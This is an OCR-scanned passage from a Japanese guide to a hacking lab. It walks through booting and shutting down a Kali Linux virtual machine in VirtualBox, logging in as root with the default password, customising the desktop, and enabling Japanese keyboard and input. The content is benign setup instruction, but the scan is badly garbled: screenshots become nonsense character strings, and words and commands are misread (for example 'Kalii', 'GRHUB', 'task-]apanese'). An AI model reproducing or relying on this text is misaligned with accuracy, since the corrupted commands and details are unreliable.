人 党 ( ほ 少 ウ _ 放 
3 語 :fiDO)s ZI 


章 
設定 ( く ) 感 遷 5 | ロー/ UI ツール 


|【 局 共 フォル ダー pm 必 

な し 

| 度 明 

fsli RolIlmg (2016 2) >54 
AM 19- 虐 -25 

UscfPQnmht ICH 
os3wwrd [Dar 

引 語 ト kazbowd lnuth 

を sl oma sr 

| hpe//wwks ksliore/ 

* LCMW8TialC 

し 

し 3 

hp/ ゲ tsolg よ alcrg/ 





* Fctum/5urrort 
IDe//ICumm す alcee/ 
| \ 日 ue Trsckee- 





図 2-12 「 説 明 ] 欄 の 内 容 


イン ポー ト が 完了 すれ ば 、ova フ ァイル は 不要 な の で 削除 し て も 問題 あり ませ 
ん 。 バ ッ ク ア ッ プ し て お け ば 、 ま た 必要 に な っ た 際 に ダウ ン ロ ー ド する 時 間 を 節 
約 で きま す 。 
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沙 Kali の 起動 と 終了 


仮想 マシ ン の Kali の 起動 と 終了 の 方 法 を 学び ます 。 


り Kali を 起動 する 
VirtualBox を 起動 する と 、 左 ペイ ン に 仮想 マシ ン (の アイ コン ) が 表示 され ます 。 
起動 し た い 仮想 マシ ン を 選択 し て 、 上 部 の 起動 アイ コン を 押す と 起動 で きま す 。 
実際 に Kali を 起動 する 前 に 、 仮 想 マ シン の 起動 モー ド に つい て 説明 し ます 。 
VirtualBox の 仮想 マシ ン の 起動 モー ド に は 、 次 の 3 種類 が あり ます 。 単純 に 起動 ア 
イコン を 押す と 、 通常 起動 と し て 扱わ れ ま す が 、 ア イコ ン の 隣 の 下 印 を 押す と 、 別 
の 起動 モー ド を 選べ ます ( 図 2-13) 。 


・ 通常 起動 
* ヘッ ドレ ス 起 動 


・ デ タッ チ モ ー ド 起動 


WOraclc VN VituaBox マネ ー ジ ャ ー 


コ ァ イル [用 伯 邊 マシ ツ (M) ヘル プ (H) 


( 連 8 ツマ ・ 


白 坊 (N) 計 室 師 | 了 杏 志門 
kal-Lmex-2019:5 > 通 富 息 動 (N) 了 : 
0 - ウ ニハ > ドレス 怒 待 (H) さ 


包 こ Pai-Liwux-2018 . め デラ ッ チ モー ド だ 誠 | 
ノ 司 保 





図 2-13 仮想 マシ ン の 起動 モー ド の 選択 


通常 起動 は 、 物理 PC に お ける 電源 オン に 対応 し ます 。 本書 で | 仮想 マ シン を 起 
動 す る | と 表現 し た と き は 、 こ の モー ド で の 起動 を 意味 し ます 。 仮想 マシ ン を 停 
止 す れ ば 、 電 源 オ フ と し て 扱わ れ ま す 。 

ヘッ ドレ ス 起 動 は 、 仮 想 マ シン を バッ ク グ ラウ ンド で 起動 し ます 。 仮想 マシ ン 
の ウィ ンド ウ が 表示 され ず 、VirtualBox の メイ ン 画 面 に お ける プレ ビュ ー 画 面 で 
動作 を 日 視 で きま す 。SSH な どの リモ ー ト アク セス を メイ ン に する 場合 に 用 いら 
4 ます 。 
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デ タ ッ チ モ ー ド 起動 は 、 通 常 起動 の よう に 仮想 マシ ン の ウィ ンド ウ が 表示 され 
ます 。 た だ し 、 仮 息 マ シン を 停止 する と き に 、 バ ッ ク グ ラウ ンド で 凌 続 する こと 
を 選択 で きま す 。 つ まり 、 通常 起 動 と ヘッ ドレ ス 起 動 を 複合 し た も の と いえ ます 。 

ここ で は 、 仮 想 マ シン と し て Kali を 選択 し て 、 通 常 起動 し ます 。 上 部 の 起動 ア 
イコ ン を 押す か 、 右 クリ ッ ク し て | 起動 」 > | 通常 起動 ] を 選び ます 。 


2)GRUB の フー ト 画 面 が 表示 され る 
仮想 マシ ン の ウィ ンド ウ が 表示 され 、 そ の 中 で Kali が 起動 し ます 。VirtualBox 
の ロゴ が 表示 され 、 次 に GRUB の プー ト 画 面 が 表示 され ます ( 図 2-14)。 


「 KALI / 


YOFPPE 還 SIVE S ま CURITY 


US t ロ SgleCt MP1Ch antFPM 1S hisnl1ghnted, 
ト thE SECEtEd IS。 E 1 ロ 本 11 1hE COITarMOS 
- ド CD 咽 町 ヨ ロロ - 1 1nE . 
ha hiEhLighted mntPu uiLl De GaCutgd au 





回 ウ みゆ ウジ は Feht Ccmol 


図 2-14 GRUB の ブー ト 画 面 


GRUB (GRand Unified Bootloader) は 、Linux で よく 使わ れ て いる ブート ロー 
ダー (PC 起動 時 に OS を 開始 する プロ グラ ム ) で す 。GRUB は 、 表 2-1 の 2 つ に 大 
別 され ます 。GRUB 2 の 方 が 高 機能 で あり 、 Kalii で は GRUB 2 が 用 いら れ て いま す 
に 13) 。 


*13 : GRUB の バー ジョ ン は 、 プ ー ト 画面 の 上 部 で 確認 で きま す 。GRUB 2 は 、 様 々 な ファ イル シ 
ステ ム か ら 起 動 で き 、LVM や RAID の サポ ー ト が 強化 きれ 、UEFI Secure Boot 機 能 (アジ タル 
著名 で 0S の プー ト を 検証 する 仕組 み ) に も 対応 し て いま す 
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表 2-1 GRHUB の 種類 
呼び 名 採用 ディ スト リ ビ ュー ショ ン 


09x |GRUB Legacy | 旧 デ ィ ス トリ ビュ ーション (Cent OS 6 以前 ) 





新しい ディ スト リ ビ ュ ーション (Cent OS 7 以降 、 Debian 6 以 
1.9x 以降 GRHUB 2 附 、UbUntu な ど ) 


Kali を 起動 する た め に は 、 その まま 数 秒 待 ち ま す 。 すぐ に 起動 し た けれ ば 、Kali 
GNU/Linux を 選択 し て [Enter| キー を 押し ます 。 
その 後 、Kali の 起動 メッ セー ジ が 表示 され る の で 、 し ば らく 待ち ます 


3 Kali に ロク イン する 
ゲラ フィ カル な 認証 画 面 が 表 示さ れ ま す ( 図 215)。 ユ ー ザ ー 2 ア 2 
ワー ド に toor を 人 和信 力 し て ログ イン し ます 。 
[ 悪 Kai-nux -2018.2 (54b(0) (スナ ッ プ ショ ッ ト 1 [ 室 行 下 ] - Oracle VM VirtualBox 


J テ イル 仮 程 マ タツ 委 示 入力 テ 省 イス 見 ブナ 


Wed 05:39 





回 り WE ロウ コウ 了 避 ②)[@] FR gh Corral 


図 2-15 Kali の ログ イン 認証 画面 
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4 Kali の デス クト ッ プ 画面 を 確認 する 


Kalii の デス クト ッ プ 画面 が 表示 され ます 。 こ の と き 、 ーー ン の 画面 と Kali 
の 画面 を 区 別して 認識 し て くだ さい ( 図 2-16。 次 の 図 も 参照 )。 


ri に - う 3 と - | | 本 宇 」 - Ir 


E 


| ファ イル 価 壮 マシ ン 季 示 ー デバイス ーー 一 


メー 


に バリ と. を = 中 た 


仮想 マシ ン の 画面 (ここ で は Kall) 





仮想 マシ ン の 仮想 ハー ド の 状態 ホス トキ ー 


せ | ef mdcms ・Cul ・ Al 


図 2-16 仮想 マシ ン の 画面 と Kali の 画面 


Kai は バ パー ジョ ン ア ッ プ する た びに 、 デ スク トッ プ の イン ター フェ ー ス が 少し 
ずつ 変わ っ て いま す 。 こ こ で は バー ジョ ン 20182 の デス クト ッ プ 画面 に つい て 簡 
単に 説明 し ます ( 図 2-17)。 

左 の アイ コン 群 は 、Kali で 人 気 か つ 主 要 な ツー ル で す 。 本書 で よく 使用 する の 
は 、 上 か ら 1] 番 目 の Firefox ESR (プラ ウザ )、2 番 目 の Terminal (コマ ンド を 入力 
する た だ た め に 使う )、3 番 目 の Files (ファ イル ・ エ クス プロ ー ラ ー)、 下 か ら 2 番 目 の 
Leafpad (テキ スト エディ タ ) に な り ま す 。 

上 部 メニ ュー は 左 か ら 、 Applications、 Places、 日 付 、 リ サーク スペ ー ス 、 Recording、 
ネッ トワ ー ク 情報 、 サ ウン ド 設 定 、 電 源 ・ ロ グ ア ウ ト 関 連 と な っ て いま す 。 
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アプ リケーション 一 覧 が メニ ュー 形式 で 表示 され ます 。 


ーー ce の | 


そり 二 こ メー ad に と り 
(に を まき " 記 





ワン ル アル アア 4 リリ ネッ トワ ー ク 情報 、 サ ウン 
リリ リリ シャル アン < 7 3 か 「 = レア スン 4 ソ 
表示 され ます 。 メニ ュー が 表示 され ます 。 


| よく 使用 する アプ リ が 
ニュ ね も 6 リー ピル アル 2 


図 2-17 Kali の デス クト ッ プ 画面 


ー ル 名 が わか っ て いれ ば Terminal か ら コ マン ド で 起動 で きま す が 、 ど の ツー 
ル を 使え ば よい か わか ら な いと き は Applications か ら 探 し 出せ ます 。Applications 

で は 、 攻撃 ご と に ツー ル が 分 類 さ れ て いる た めで す 。 

Places で は 、 特 定 の ディ レク トリ に ジャ ンプ し 、Files で 表示 で きま す 。 

ワー クス ペー ス は 、 仮 想 的 な デス クト リプ を 作り 出す 機 有 で す 。 従来 の Linux か ら 
採用 きれ て いる 仕組 み で あり 、Windows 10 で も 似 た よう な 機能 が 備わっ て いま す 。 

Recording で は 、 音 声 ・ 静 止 画 ・ 動 画 の 記録 を 指示 で きま す 。 

番 石 の 下 矢 印 か ら 、 ネ ットワーク 情報 、 サ ウン ド 設 定 、 電 源 ・ ロ グ ア ウ ト を 
反 作 で きま す 。 ま た 、 設 定 画面 を 表示 する アイ コン も 用 意 き れ て いま す 。 

本 書 で 解説 する の は 、Kali の ほん の 一 部 の 機能 だ け で す 。 よ り Kali を 使い こ な 
す た め に は 、 ど ん どん 使い 倒す こと が 有効 と いえ ます 。 Kali は 仮想 マシ ン な の で 、 
も し 起動 で き な い ほど 改造 し た と し て も 、 ホ スト 側 の OS が 壊れ る こと は あり ませ 
ん 。 色々 な 箇所 を 押し た り 、 ツ ー ル を 起動 し た りす る こと を お すす めし ます 。 
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5 仮想 マシ ン を 終了 する 


最後 に 、 仮想 マシ ン の 二 Orncic VM VimusiBox マネ ー ジ ャ ー 
ア ィ MP AZ) 





了 方 法 に つい て 説明 し ます 。 

仮想 マシ ン の OS 上 で 電 
源 を オフ に すれ ば 、OS の 
終了 処理 を 経て 、 仮想 マシ 
ン は 終了 し ます 。 この よう 


(市 2 イッツ msRS) 基 | 合 話 克 





⑨ り セ yhR 
に OS 側 の 終了 処理 が 基本 | 
と な り ま す が 、VirtualBox | 
か ら 人 仮想 マシ ン に 対し て (9 業 新 の 符 環 に 新 | ) 
2E エク スプ ロー ラー- に 和 志 (H) に kolipe/ 
終了 処理 を 指示 する こと 内 カト 727 に ショ ー ト カト f 作 反 E often 





も で きま す 。 VirtualBox の oe 

メニ ュー の | 仮想 マシ ン 」> 図 2-18 仮想 マシ ン に 対す る 終了 モー ド 

「 閉 じ る 」 か ら 終了 モー ド 

を 選択 で きま す ( 図 218)。 そ の 際 に 選べ る 終了 モー ド は 、 次 の 3 種類 が あり ます 。 


* 保存 状態 
・ACPI シ ャ ッ ト ダ ウン 
* 電源 オフ 


保存 状態 を 選ぶ と 、OS の 状態 を 保持 し た まま 仮想 マシ ン が 終了 し ます 。 そ の た 
め 、 保 存 状 態 の 仮想 マシ ン を 起動 する と 、 も と の 状 台 の まま 起動 きれ ます 。 例え 
ば 、Kali で Termnal を 開い た まま 保存 状態 モー ド で 終了 させ た と し ます 。 そ の 仮 
想 マ シン を 起動 する と 、 Terminal が 開い た まま の 状態 で 復帰 され ます 。 OS の 起動 
や 終了 の 処理 が 実行 され な い の で 高速 で す が 、 状 態 の 保存 の た め に デー タ 領 域 を 
消費 し ます 。 

ACPI シ ャ ッ ト ダ ウン を 選ぶ と 、 仮 想 マ シン に 対し て ACPI シ ャ ッ ト ダ ウン 信号 
を 送信 し ます 。ACPI (Advanced Configuration and Power Interface) は 、 電 源 
管理 を 制御 する 規格 の 1 つ で す 。 ゲ スト OS に て ACPI デ ー モ ン で ある acpid が 起 
動 し て いれ ば 、ACPI シ ャ ッ ト ダ ウン 信号 を 受信 する こと で OS の 終了 処理 が 実行 
され ます 。 
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電源 オフ を 選ぶ と 、 即 電源 が 落ち ます 。 こ れ は 、 物 理 PC に お いて 、 電 源 ボ タン 
を 長押 し し た り 、 電 源 ケ ー ブ ル を 抜い た り し て 強制 的 に 電源 を 落と し た こと に 対 
応 し ます 。 OS を 起動 し た まま いき な り 電 源 を 落と すこ と は 、 好 まし く あ り ま せ 
ん 。OS が 処理 を 受け 付け な く な っ た 状況 の と き に 使用 し ます 。 

ここ で は 、Kali か ら 終 了 処 理 を 実行 し て 、 仮 想 マ シン を 終了 させ ます 。 


"USB 2.0 controller not found" エラ ー 


VirtualBox に Extension Pack を イン スト ー ル し 1 - 「 
て いな い 場 合 、 仮 想 マ シン の 起動 時 に "USB 20 20182 (ITG 








controller not found と いう エラ ー ダ イア ログ が ーー- 
表示 され る こと が あり ます ( 図 2-19) 。 pers te US528zmalz serpwisles | 
解決 法 と し て は 、 次 が 挙げ られ ます 。 ーー mn 
MeOat vo 5 dl 
・Extension Pack を イン スト ー ル する 。 WuGeNOTe 
NNN\| は あこ 。 
舞 効 に す み ( 図 2.20 ) ト bae2-f665I06b0wd) 
* 仮想 マシ ン の 設定 に て 、 USB1.1 コ ント ロー ラー し デー 
に 変更 する ( 図 220)。 図 2.19 エラ ー ダ イア ログ 


ビ | (GB コン ト 1 - う - 念 有 侍 IE(UO 
⑳ USB 1!(CHO サ ゴト - う - 
5B 3W(EHCN エン ローテ ー 
Py 05B 】0(TCD コッ トー ラー 
UE テ ) スコ ィ ルル き -Y ロ 


ュー ター インター フェ ー ス ek TS 


玉 3A ち 統 下 見 っ まし た 設 し き ャ > セル 





図 2-20 USB の 設定 画面 


本 書 で は すでに FExtension Pack を イン スト ー ル し て いる の で 、 こ の 問題 は 発生 
し ませ ん 。 
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Linux の ディ レク トリ 構成 


Linunx を イン スト ー ル する と 、Linux カー ネル 、 コ マン ド 、 設 定 フ ァイル な ど が 
適切 な ディ レク トリ に 配置 され ます 。 Linux の ディ レク トリ 構成 は 、FHS 
(Filesystem Hierarchy Standard) と いう 規格 に よっ て 標準 化 さ れ て いま す 。 大抵 
の ディ スト リ ビ ュ ーション は この FHS に も と づい て いま す が 、 完 全 に 準拠 し て い 
る わけ で は な く 、 デ ィ ス トリ ビュ ーション に よっ て 若干 の 差 が あり ます ( 表 2-2) 。 


表 2-2 Kali の 基本 ディ レク トリ 


ルー トディ レク トリ 。 フ ァイル シス テム の 最上 位 に 位置 する 。 


ユー ザー ご と の ホー ム デ ィ レ クト リ 





/Var メー ル や ログ と いっ た 可変 デー タ 


ルー トディ レク トリ か ら 見 る と 、 サ プ デ ィ レ クト リ が 木 の 枝 の よう に 階層 化 さき 
れ て いま す 。 こ れ を ディ レク トリ ・ ツ リー と いい ます 。 
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(で 11ITD. て ソル ルレ と: な あく 


本 書 で は Kali の 操作 が メイ ン と な る の で 、 使 いや すい よう に カス タマ イズ し ます 。 


氷解 像 度 を 変更 する 

デフ ォ ル ト の まま で は 、 仮 想 マ シン の ウィ ンド ウサ イズ は 比較 的 小さ いと いえ 
ます 。 使用 し て いる マシ ン の 画面 サイ ズ と の 兼ね 合い に な り ま す が 、 画 面 は 大 き 
くし た 方 が 操作 し や すく な り ま す 。 仮想 マ シン の 画面 の 右 下 に マウ スポ イン タ を 
合わ せ て 引っ 張る こと で 、 画 面 サ イズ を 調整 で きま す 。 

また 、Kali 側 の モニ ター の 解像度 を 変更 する こと で も 、 ウ ィ ン ド ウ の サイ ズ を 調 
整 で きま す 。 切り の よい 比率 の 画面 サイ ズ に し た けれ ば 、 Kali 側 の 設定 で 調整 し た 
方 が よい で し ょ う 。 


①Settings 画面 を 表示 する 
右上 の 下 矢印 を 押す と 、 プルダウン メニ ュー に Settings アイ コン が あり ます 。 こ 
れ を 押す と 、Settings 画面 が 表示 され ます ( 図 2-21) ( 図 2.22) (*14) 。 


Applications > Places マ Fn う 1・O 「 ー 回 
2] ① 下 矢印 アイ コン を 押し ます 。 


ご か コリ ルキ だ ラウ : 
ーーーーーーーー 志 ぶさ れ ま す 。 ここ か ら 音 
量 調整 や 、 ユ ー ザ ー の 切 

り 替 えも で きま す 。 


③Settings ア イコ ン を 押し ます 。 





図 2.21 Settings アイ コン 


14 : Kai の バー ジョ ン に よっ て は 、 画 面 の 表示 が 若干 異な り ま す 。 
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② 解 像 度 を 変更 する 

Kali の 設定 は 基本 的 に ここ か ら 変 更 で きま す 。 こ こ で は モニ ター の 解像度 を 変 
更 し た い の で 、「Devices」 > 「Displays」 を 選択 し ます 。 

Displays の 設定 画面 に て 、 Resolution を 押す と 、 代 表 的 な 解像度 が プル ダウ ン メ 
ニュ ー で 表示 され ます ( 図 2.23) C15)。 

解像度 を 選択 し て 、 右上 に 表示 され る [Apply] ボタ ン を 押す と 、 一 時 的 に 適用 
され ます 。 こ の と き 、 仮 想 マ シン の ウィ ンド ウ ご と 大 きく な り ま す 。 設定 を 適用 
する 場合 に は [Keep Changes] ボタ ン 、 設 定 を 破棄 し て や り 直 す 場 合 に は 
[Revert Settings] ボタ ン を 押し ます 。 


*15 : 従来 は VirtnalBox Guest Additions を 適用 し な いと 、 解 像 度 の 選択 肢 が と て も 少な か っ た の 
で す が 、 現 在 で は 多く の 選択 肢 が あり ます 。 
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Deywces Display* @ の 9 人 
①Dlsplays を 選択 し ます 。 


VBX 






呈 KerbOar0 


Orienta4ion LndsC2Pe 
で Mouse & Touchpad 






昼 Printers ReSQIuttn 1312 < 856 [ ま 2] 


2550 x 1600 (1E10) | 


1920 』 1440 (4.3) 
記 Wacom Tablct Niht Dit 1856 x 1392 (3:3 


W Remoysble Medla 


A ce 179zZ * 1349 (43) 


2048 : 1152 ロ 653) 


②Resolutlon を 押し て 、 1920 x 1200 10) 
魚 像 度 を 選択 し ます 。 還 還 cai 


1600 x 1200(③3) 








168S0 * 1050 ロビ 1] 


ペニー 





図 2-23 Displays の 設定 画面 


兆 スク リー ン ロ ッ フク を 無効 に する 

Kalii は デフ ォ ル ト で 5 分 聞 何 も 操作 し な いと 、 画 面 が プラ ンク スク リー ン (真っ 
暗 な 画面 ) に な り ま す 。 こ れ は 、 離 席 中 に 画面 を 了 覗き 見 られ る こと を 防い だ り 、 
バッ クラ イト を 消し て 節電 し た りす る た め の も の で す 。 マ ウス で 探 作 す る と プラ 
ンク スク リー ン が 解除 され ます が 、 カ ー テ ン が か か っ た 状態 に な っ て いま す 。 マ 
ウス を 下 か ら 上 に 向かっ て ドラ ッ グ 立 ド ロッ プ す る か 、 ーー キー を 押す こと 
で カー テン を 解除 で きま す が 、 も と の 画面 を 表示 する た だ た め に は パス ワー ド を 人 入力 
し て ロッ ク を 解除 し な けれ ば な り ま せん ( 図 2-24)。 





図 2-24 ロッ ク 画 面 


ハッ キン グ ・ ラ ボ で は 、 複 数 の ゲス ト OS を 立ち 上 げ て お き 、 日常 の PC 作業 は 
ホス ト OS 側 で 行う と いっ た 場合 が 多い と 考え られ ます 。 つ まり 、 ゲ スト OS は し 
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ば らく 放置 する こと が 多く 、 そ の ゲス ト OS を 操作 する た びに パス ワー ド を 入力 す 
る の は 非常 に 手間 と いえ ます 。 

そこ で 、Kalii が プラ ンク スク リー ン に 移行 し な いよ うに 設定 し ます 。Settings 画 
面 を 表示 し 、 左 ペイ ン か ら 「Power」 を 選択 し ます 。「Power Saving] の 「Blank 
screen」 を 、「Never」 (な し ) に 変更 し ます ( 図 225)。 こ うす る こと に より 、 カ ー 
テン や ロッ ク 画 面 に 移行 し ませ ん 。 








図 2225 ブラ ンク スク リー ン の 無効 化 


》 日 本 語 キ ー ボ ー ド に 対応 させ る 

デフ ォ ル ト で は 英語 キー ボー ド か ら の 入力 が 想定 され て いま す 。 英語 キ ー ボ ー 
ド を 使用 し て いる の で あれ ば 、 そ の まま の 設定 で 問題 あり ませ ん 。 も し 日 本 語 
キー ボー ド を 使用 し て いる の で あれ ば 、 次 に 示す 手順 を 行い ます ("16)。 


*16 : 英語 レイ アウ ト の まま で 日 本 語 キ ー ボ ー ド を 操作 する と 、 一 部 の 記号 の 入力 が うま くい きま 
せん 。 こ うし た 状況 で も 無理 や り 入 力 す る テク ニッ ク が 必要 と な る 場面 が 出 て きま す 。 そ うい っ 
た 場合 に は 、 巻 末 付 録 の [キー ボー ド の レイ アウ ト 対 応 表 ] を 参考 に し て くだ さい 。 
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1) 「Region & Language」 を 選択 する 
Settings 画面 を 表示 し ます 。|Region & Language」 を 選択 し 、「Input Sources」 
の と ころ に 使用 する キー ボー ド を 登録 し て いき ます 。 


② キ ー ホ ボー ド を 登録 する 

| Input Sources」 の [+]」 ボタ ン を 押し ます 。 言語 を 選択 で きる の で 、| Japanese」 
を 選択 し ます 。 次 に キー ボー ド を 登録 し ます が 、 日 本 語 キ ー ボ ー ド に も 様々 な 種 
類 が ある の で 、 自 分 の 環境 に 合っ た も の を 選択 し ます 。 通常 の キー ボー ド で あれ 
ば 、 一 番 上 の |]apanese」 で 問題 あり ませ ん 。 最 後に LAdd] ボタ ン を 押せ ば ば 、 
| Region & Language」 画面 に 戻り 、|Input Sources」 に |「Tapanese」 が 追加 され 
ます ( 図 2-26)。 


@@ @ 












* Bluetooth Lanquade English (United States) 











Backqround Formats Unted States (Englksh) 


由 Nolificalons 







Input Sources Options 





Q Search 














《9 Universal Access Japanese w 






曲 Pay 
[+] ボ タン で 追加 で きま す 。 この ボタ ン か ら 、 キ ー ボ ー ド 
<3 shang [一] ボタ ン で 削除 で きま す 。 レイ アウ ト を 確認 で きま す 。 





2-26 Input Sources の 設定 


[Tapanese」 を 選択 し た 状態 で 、 右 下 の キ ー ボ ー ド アイ コン を 押し ます 。 す る と 、 
キー ボー ド の レイ アウ ト が 表示 され る の で 、 使 用 し て いる キー ボー ド と 同じ で あ 
る か を 確認 し ます ( 図 227)。 同じ で あれ ば 問題 あり ませ ん 。 同じ で な けれ ば 、 選 
択 し た キー ボー ド が 間違っ て いる の で 、「Input Sources」 に 新た に 追加 し 直し て く 
だ さい 。 
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図 2-27 日 本 語 キ ー ボ ー ド の レイ アウ ト 


不要 な キー ボー ドレ イア ウト は 「[-] ボタ ン を 押し て 、 削 除 し て お きま す ( 図 
2-28) 。 








図 2-28 日 本 語 キ ー ボ ー ド の み の 最 終 状態 


な お 、 こ こ で 行っ た 設定 は 、 日 本 語 キ ー ボ ー ド の レイ アウ ト を 適用 する だ け で 
す 。 日 本 語 を 入力 で きる わけ で は あり ませ ん 。 


日 本 語 表 示 に する 


Kali で は 特別 な 設定 を する こと な く 、 日 本 語 の ファ イル 名 な ど は 表示 され ます 
し 、 プ ブラ ウザ で 日 本 語 サ イト を 閲覧 し て も 文字 化け し ませ ん 。 し か し な が ら 、 メ 
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ニュ ー や メッ セー ジ は 英語 に な っ て いま す 。 これ を 日 本 語 に 変更 で きま す (*17) 
の 設定 は 好み の 問題 で ある た め 、 各 自 の 判断 で 設定 する か どう か を 決定 し て く 
た し い ゝ 


1Language と Formats を 変更 する 

Settings 画面 を 表示 し ます 。 | Region & Language」 を 選択 する と 、Language 
(表示 言語 ) と Formats (日 時 な どの 表示 形式 ) を 変更 で きま す 。 デ フォ ルト で は 
どちら も ゃ も PEPnglish に な っ て いま す が 、 日 本 語 (Formats は 日 本 ) に 変更 で きま す 
( 図 229)。 言 語 を 変更 し た 場合 に は 、 再 起動 が 必要 に な り ま す 。 


し 


Q @ の の 


キー ボー ド シ ョ ー ト カッ ト すべ て リセ ゼット 


ウィ ン ギ ドウ 


ウィ ント つが 枯れ て UI れ ば 和孝 前 曽 に 、 そ つう て な けれ ば 正彰 用 
に 全 王 す る 


ワ ィ ンド つき を すべ て の サー クス ペー ス に 甘 二 す る が どう か を き 缶 
り 衣 える 


ウィ ンド の を 傘 間 方向 に 琴 大 化す る 
フィ ンド つ を 礎 す 

フィ ンド つき 重 穫 出 に 人 ゆ 因 する 

ワ ィ ント ドロ を 最大 化す る 

コロ ィ ン ド コロ を 乱舞 軸 に ほ 振 する 


ウィ ンド ト つ を 小 半 方 向 に 鞭 大 人 す も 





図 2-29 言語 を 日 本 語 に 指定 し た と き の 画 


て 変更 し な いで お き ます 。 7 な ぜ な ら ば 、 メ ニュ ニュー 名 が 日 本 語 に 
く 


光 タイ ム ゾ ー ン を 日 本 に 設定 する 
日 本 に 住ん で いる の で あれ ば ぱ ば 、 タ イム ゾー ン を 日 本 に 変更 し ます 。 


り タ イム ソー ン を 変更 する 


テー 画面 を 表示 し ます 。 | Details」 > |Date を Time」 を 選択 し ます 。 | Time 
Zone」 を 押す と 、 世 界 地 図 が 表示 され る の で 、 日 本 を 選び ます 。「JST (UTC+9) 


*17: ダイ アロ グ ゲ の メッ セー ジ や オプ ショ ン の 設定 項目 が 日 本 語 で 表示 えれ れ ば 、 意味 が わか りや 
すく な り ま す 方 、Terminal が | 端末 | と 訳 さ れ て し まい ます 
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Tokyo, apan」 と 表示 され た だ たら 、[x] ボタ ン を 押し ます 。 す る と 、Time Zone が 
「JST (Tokyo. Japan)」 に 変更 され ます ( 図 2-30)。 


| 本 PEIH 症 





Akemwit Der & Timm 
0 Uscis AutawwNc Tim て nme 
WI まま 4N 11MT44I ま I Wi 


査 La た DKMINW* 


ーーーー NO と を に ジン こ と スコ ニレ コピ 
ーー 変更 し まし た 。 





② 日 時 が 合っ て いる こと を 
だ 1 さ . 大 


図 2-30 タイ ム ゾ ー ン を 日 本 に 変更 し た 


2 時 刻 が 合っ て いる こと を 確認 する 


デス ク ト ッ プ ヒ 品 の 時 刻 が 合 っ て いしい > る wa と を 確 認 し ま す O 


氷 日 本 語 入力 で きる よう に する 
日 本 語 パ ッ ケ ー ジ を イン スト ー ル し て 、 日 本 語 (全角 ) を 人 人力 で きる よう に し 


ます 。 
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佑 日 本 語 入力 の 設定 方 法 


① 入 力 設定 の アイ コン を 追加 する 
Terminal を 起動 し て 、 次 を 実行 し ます C18) (*19) 。 


Poott 個 ka11:- apt instal] -y task-]apanese task-]apanese-desktop 


② 再 ログ イン する 
ログ イン し 直し て 、 設 定 を 反映 させ ます 。 


③ 入 力 方 式 を 変更 する 

デス クト ッ プ 画面 の 右 下 に 図 231 の アイ コン が 表示 され 、Leafpad を 起動 する 
と 「 現 在 の 入力 |] アイ コン に な り ま す 。 こ れ を 選択 する こと て で 入力 方 式 を 選ん だ 
り 、 設 定 を 変更 し た り で きま す 。 


回 〇 w ゆ グ コ ウロ or・w | 
Leafpad を 起動 する と アイ コン が 変化 し ます 。 
図 2-31 [EN」 アイ コン が 表示 され た と ころ 








ここ で は 「EN」 アイ コン を 押し ます 。 メ ニュ ー が 表示 され る の で 、| Anthy 


*18 : この コマ ンド に より イン ター ネッ ト に アク セス し ます が 、 自 動 的 に NAT が 割り 当て られ て 
いる の で 、 接 続 に 問題 は みな い は ず で す (ネッ トワ ー ク に つい て の 詳細 は 後述 )。 コ マン ド の 実行 時 
に "Resource temporarily unavailable" と いう エラ ー が 表示 され た 場合 は 、 Kali を 再起 動 し て か ら 
再度 コマ ンド を 実行 し て くだ さい 。 そ れ で も うま くい か な い 場 合 は 、 次 を 実行 し て くだ さい 。 


FOOot@ka11:-# 1sof /var/11b/dpkg/1ock 
Foot@ka1 ふ :-# ki11 -9 < 上 記 の コマ ンド で 表示 され た PID> 


*19: ここ で 解説 する 方 法 以 外 で も 日 本 語 入 力 を 実現 で きま す 。 詳細 に つい て は 、 Debian で の 日 本 
庄 環 境 の 構築 方 法 を 検索 し て くだ さい 。 
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(UTEF-8)」 を 選択 し ます ( 図 2.32)。 す る と 、[ 半 角 / 全 角 ]」 キー で 半角 入力 と 全角 
入力 を 切り 替え られ る よう に な り ま す 。 


マ 
と 7 OS 。 


@ 史 Anthy (UTF-8 


) IM Pinyin (Unicode) 
販 Pinyin (TradihonaU) 


7n-PS-PTOrrer 
ml /n-ath-nhonetic 
-) 委 . m17n-a-tcovle 
m17n-| は -tTyCode 





向い ウロ 軍人 の 加 ck 。 


図 2-32 Anthy を 選択 し た と ころ 


④) 日 本 語 が 入力 で きる か を テス ト す る 
Leafpad に 日 本 語 を 含む 文字 列 を 入力 し て み ま し ょ う ( 図 233)。 も し 全角 に ぁ 
ら な いと き は 、Anthy が 選択 さき れ て いる か を 確認 し ます ( 王 守 ア イコ ン )。 


テス ト フ ァイル 





半角 / 全角 キー で 、 半角 入力 と 全角 入力 を 切り 二 え で きま す 。 | 


図 2-33 日 本 語 入 力 の テス ト 
以上 で 、 日 本 語 を 入力 で きる よう に な り ま し た 。 


人 @ 入力 方 式 の 改善 
メニ ュー 内 の 不要 な 項目 を 無効 に する こと で 、 メ ニュ ー が 見 や すく な り ま す 。 


①Global settings 画面 を 表示 する 
一 番 右 の Preference アイ コン を 押し て 、uim-prefrgtk3 の Global settings 画面 を 
表示 し ます ( 図 2-34) 。 
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2-34 Global settings 画 面 


② 入 力 方 式 を 編集 する 

Enabled input methods 画面 に て 、 有 効 に する 入力 方 式 を 選べ ます 。 Enabled 欄 
か ら 、| Anthy (UTF-8)」 以外 を 選択 し て 、 Disabled 欄 に 移動 させ ます 。[Close] ボ 
タン を 押す と 設定 が 反映 され ます ( 図 235、 図 236)。 


Enabled input methods @ 


Anthy (UTF-8) 


①「Anthy (UTF3)] 以外 を 選択 し ます 。 
New PImyin (SImplifie< 


[ShIft] キー を 押し な が ら 選 べ ば 複数 選択 
に < た を きま: だ 


Plnyin (Unicode] 
Pinyin (lraditional) 
ml/h-da- post 
mlJh-qrc-mlzuochl 


② 選 択 し た 状態 で [>] ボタ ン を 押す と 、 
DIlsabled の 欄 に 移動 し ます 。 


ml17n-fr-azerty 


ml /n-nsk- ロ honetic 
m] nh-am-Se「 は 
ml7n-ka-kbd 

m1 Jn-h-khr 





ClosE 


図 2-35 入力 方 式 の 編集 
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図 2-36 「Anthy (UTF-8)] だ け を 有効 に し た 


する と 、Global settings 画面 の 「Enabled input methods」 に 「Anthy (UTF-8)」 
だ けが 表示 され ます ( 図 2.37)。[Apply] ボタ ン を 押し て 設定 を 適用 し ます 。 


HtpP 

Anclarr Prediction 
Japanese RomaliKana 
Global key bindinqs 1 
Global key blindinqs 2 
Antiy 

Antiy (UTF-B) 

Anthy (advanced) 
Anthy key bindinqs 1 
Anthy key bindinqs 3 
Anthy key bindinqs 3 
